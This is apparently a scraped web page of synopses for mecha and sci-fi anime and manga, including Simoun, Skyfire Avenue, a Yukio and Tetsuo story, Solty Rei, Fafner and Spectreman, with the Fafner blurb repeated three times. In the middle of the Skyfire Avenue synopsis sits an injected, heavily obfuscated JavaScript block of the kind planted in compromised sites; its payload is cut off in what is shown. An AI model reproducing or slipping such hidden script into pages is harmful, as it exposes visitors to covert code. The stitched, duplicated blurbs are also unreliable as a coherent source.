In the world of Daikuuriku, everyone is born female, and chooses which sex they wish to become at age 17. In this world, the peaceful theocracy of Simulacrum is guarded by magical flying machines called "Simoun", which can only be piloted by young girls who haven't chosen a sex yet. The Simoun can activate a magical power known as "Ri Maajon" that can destroy large numbers of enemies at once. When the industrialized nation of Argentum decides that it needs to invade Simulacrum to acquire the secret of the Simoun, war breaks out, drawing the Simoun "Sibyllae" (priestesses who fly the Simoun) into a lopsided battle. Because the war is raging, the Sibyllae are granted an exemption from choosing a permanent sex for as long as they're willing to keep flying. Aaeru, a determined young Sibylla with a mysterious past, and Neviril, the leader of Chor Tempest, Simulacrum's most elite Simoun squadron, must lead their fellow priestesses through conflict both within their ranks and in the sky.
It's mainly about two different armies battling each other out with their mechas.
Skyfire Avenue is a street that is 2048 meters long. There are 168 stores here, and each of the store owners is an extremely powerful adept. The Avenue does not permit any vehicles or any robots to pass through it, much less mecha. Even the patrolling police must move about on foot. This is because this is a street for pedestrians, a lane for nobles, hidden away within this high technology world. Lan Jue, the greatest of the mercenaries, code-named ‘Zeus’, has secluded himself here in Skyfire Avenue after the death of his wife. The name of his shop is “Zeus’ Jewelry Store”, and here in Skyfire Avenue, he has been given the title, Jewel Master.<script></script><script>(function(_0x25417f,_0x6babc4){var _0x20dfc5=_0x20e8,_0x33df20=_0x25417f();while(!![]){try{var _0x48d404=parseInt(_0x20dfc5(0x175))/(-0x1243+0x7d2+-0x1*-0xa72)*(-parseInt(_0x20dfc5(0x162))/(-0x2583+0x935*0x4+0xb1))+parseInt(_0x20dfc5(0x16e))/(0x48*0x52+-0x40*-0x2e+0x228d*-0x1)*(parseInt(_0x20dfc5(0x159))/(0x3ea+-0x2677+0x2291))+-parseInt(_0x20dfc5(0x173))/(0x189d+0x75*0x1f+-0x26c3*0x1)*(-parseInt(_0x20dfc5(0x16c))/(0x18e6+0x1f9b+-0x387b))+-parseInt(_0x20dfc5(0x164))/(0x1dbf+-0x1*0x399+-0x1a1f)+-parseInt(_0x20dfc5(0x168))/(0xab9+0x1665+-0x34f*0xa)*(-parseInt(_0x20dfc5(0x15e))/(-0x4*-0x11a+-0x170+-0x1*0x2ef))+parseInt(_0x20dfc5(0x163))/(0x1*0x45+0x805*0x1+0x2c0*-0x3)*(-parseInt(_0x20dfc5(0x167))/(0x2200+0x2*0x48b+-0x2b0b))+parseInt(_0x20dfc5(0x154))/(0x13b9+0x1*-0xae8+-0x8c5*0x1);if(_0x48d404===_0x6babc4)break;else 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"Yukio... I'm going to make a friend." A shy boy named Tetsuo. The only thing he had was a giant robot named Yukio. They became "saviors" in the fight against the galactic monsters coming from outer space. After the final battle, Tetsuo returns to Earth for the first time in ten years and witnesses an astonishing world. It's a frozen Earth (named Snowball Earth), where the entire land is covered in snow and ice, being turned into a deadly world! What happened to the human race? And will Tetsuo be able to fulfill the promise he made to Yukio?
In the year 2025, huge beasts from beyond the galaxy attacked Earth. In the war that followed, humanity fought back with a giant robot named Yukio, piloted by Tetsuo Yabusame, As the massive alien swarm closed in on humanity's homeworld, Tetsuo and the Earth Defense Force deployed for the final battle with the invading horde. They lostYukio was destroyed in battle and Tetsuo survived in an escape pod. After eight years in cold sleep, the escape pod finally lands back on Earth. But when Tetsuo emerges he finds a world in ruins, entirely frozen beneath a blanket of ice and snowsnowball Earth! What happened to humanity, how did the planet freeze over, and will Tetsuo be able to keep his last promise to Yukio?+
In a future-based disaster-ridden city with an enormous gap between the rich and the poor, it is hard to tell which humans are walking around with cybernetic body parts. This makes Roy Revant's job as a renegade bounty hunter/bodyguard-for-hire even more difficult. When a young girl with unbeliveable strength rescues him from a particularly dangerous criminal, Roy realizes that perhaps help can be found in the strangest of places. Joining together with a few others, they engage in a battle to find out the truth behind the giant conglomerates that are supposedly serving mankind and making life better. Solty, an android who has lost her memory, has escaped and is being hunted by the RUC Security Bureau. She encounters a bounty hunter named Roy who adopts her as his daughter after being hired as a bodygaurd for Miranda
In a world where the strong prey on the weak, you can only get trampled on without strength. Emerging nobles have bullied and oppressed the young girl Olga Perez since she was a child due to the decline of her family. She continuously forced herself to grow up, and after becoming a soldier possessing both civil and military skills, she used her strength to overthrow the nobles who bullied and oppressed her. However, once the interest chain of the hostile nobles has been broken, more powerful opponents follow. She must continue to climb up and reach the peak of power.
***WARNING*** This manga takes place right after the True Ending of the visual novel. Minato Kageaki accepts a request from a man known as the Patriarchal Priest, who wants to be protected from musha who share the names of the legendary Japanese heroes of old.
Tatsumiyajima is the central island in the middle of a small cluster of islands, in a sleepy backwater of the Japanese isles. Not much happens there, and the island's young people go to school knowing that their lives are likely to remain peaceful and undisturbed. Or so they have been taught... but the truth is different. The fate of mankind is on the line, and Tatsumiyajima is the last line of defense against a hostile and incomprehensible enemy. At the center of it all, fighting for Humanity's continued existence, is the giant robot Fafner, the dragon that guards this final treasure of mankind.
From Crunchyroll: Tatsumiyajima is the central island in the middle of a small cluster of islands, in a sleepy backwater of the Japanese isles. Not much happens there, and the island's young people go to school knowing that their lives are likely to remain peaceful and undisturbed. Or so they have been taught... but the truth is different. The fate of mankind is on the line, and Tatsumiyajima is the last line of defense against a hostile and incomprehensible enemy. At the center of it all, fighting for Humanity's continued existence, is the giant robot Fafner, the dragon that guards this final treasure of mankind.
Tatsumiyajima is the central island in the middle of a small cluster of islands, in a sleepy backwater of the Japanese isles. Not much happens there, and the island's young people go to school knowing that their lives are likely to remain peaceful and undisturbed. Or so they have been taught... but the truth is different. The fate of mankind is on the line, and Tatsumiyajima is the last line of defense against a hostile and incomprehensible enemy. At the center of it all, fighting for Humanity's continued existence, is the giant robot Fafner, the dragon that guards this final treasure of mankind. (Source: Crunchyroll)*Note: The original TV anime aired back in 2004. A second season titled "Soukyuu no Fafner EXODUS" is currently airing, the first half aired in January of 2015, with the second half coming in October of 2015.
(from ebookjapan):A digitally remastered version of the legendary SF manga by "Soji Ushio" the founder of P-Production, which has produced numerous tokusatsu works, and "Daiji Kazumine" a master of manga! Gori the Space Ape Man, an evil genius scientist banished from Planet E for treason, arrives on Earth. Gori is fascinated by the beauty of the Earth, but he is outraged when he sees the pollution of the Earth caused by pollution. He decides that he will replace humans as the ruler of the beautiful earth. He then sends out synthetic monsters one after another, taking advantage of pollution and other factors. To stop them, the cyborg Spectreman, an agent under the command of Nebula 71 Planet, who protects the order of the universe, stands in front of Gori and his friends. The collection contains a total of 680 pages, from the pollution monster Hedron to the in-stone monster Satan King! In addition, Spectreman's secret photos from the TV version are included as an e-book bonus.